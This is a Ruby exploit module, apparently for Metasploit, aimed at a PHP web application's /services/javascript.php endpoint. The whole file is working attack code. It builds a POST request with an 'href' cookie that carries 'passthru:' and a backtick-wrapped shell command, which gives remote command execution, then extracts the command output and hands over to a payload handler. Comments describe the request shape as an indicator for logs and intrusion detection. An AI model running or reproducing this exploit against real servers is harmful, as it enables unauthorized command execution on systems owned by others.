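# Module entry point: normalises the configured base URI, sends one POST to
# <URI>/services/javascript.php, reports the HTTP status and any output that
# came back between the random markers, then hands over to the payload handler.
#
# Reads datastore['URI'] and datastore['APP']; embeds payload.raw in the request.
#
# Defender's view of the request built here (all visible in the code below):
#   * POST to .../services/javascript.php with a form body of
#     "app=<APP>&file=open_calendar.js"
#   * a Cookie header named "href" whose value is "<function name>:<arguments>",
#     here "passthru:" followed by a shell command line
# A cookie of that shape on this endpoint is a useful log/IDS indicator.
def exploit
  uri = datastore['URI']

  # Force exactly one leading slash and no trailing slash so the path
  # concatenation below yields a well-formed URL.
  uri = '/' + uri if uri[0, 1] != '/'
  uri = uri[0, uri.length - 1] if uri[-1, 1] == '/'

  function = "passthru"

  # Random 6-letter marker echoed before and after the command output so the
  # output can be cut out of the surrounding response body.
  key = Rex::Text.rand_text_alpha(6)

  # The payload is placed inside shell backticks, i.e. command substitution,
  # so its output is what gets echoed between the two markers.
  arguments = "echo #{key}`" + payload.raw + "`#{key}"

  res = send_request_cgi({
    'uri'     => uri + "/services/javascript.php",
    'method'  => 'POST',
    'ctype'   => 'application/x-www-form-urlencoded',
    'data'    => "app=" + datastore['APP'] + "&file=open_calendar.js",
    'headers' =>
      {
        'Cookie'     => "href=" + function + ":" + arguments,
        'Connection' => 'Close',
      }
  })

  print_status("The server returned: #{res.code} #{res.message}") if res

  # send_request_cgi yields nil when no response arrives; the original code
  # dereferenced res.body unconditionally and raised NoMethodError in that
  # case. Treat a missing response the same as a response without markers.
  echoed = res ? res.body.split(key)[1] : nil

  if echoed
    print_status(echoed)
  else
    print_error("No response found")
  end

  handler
end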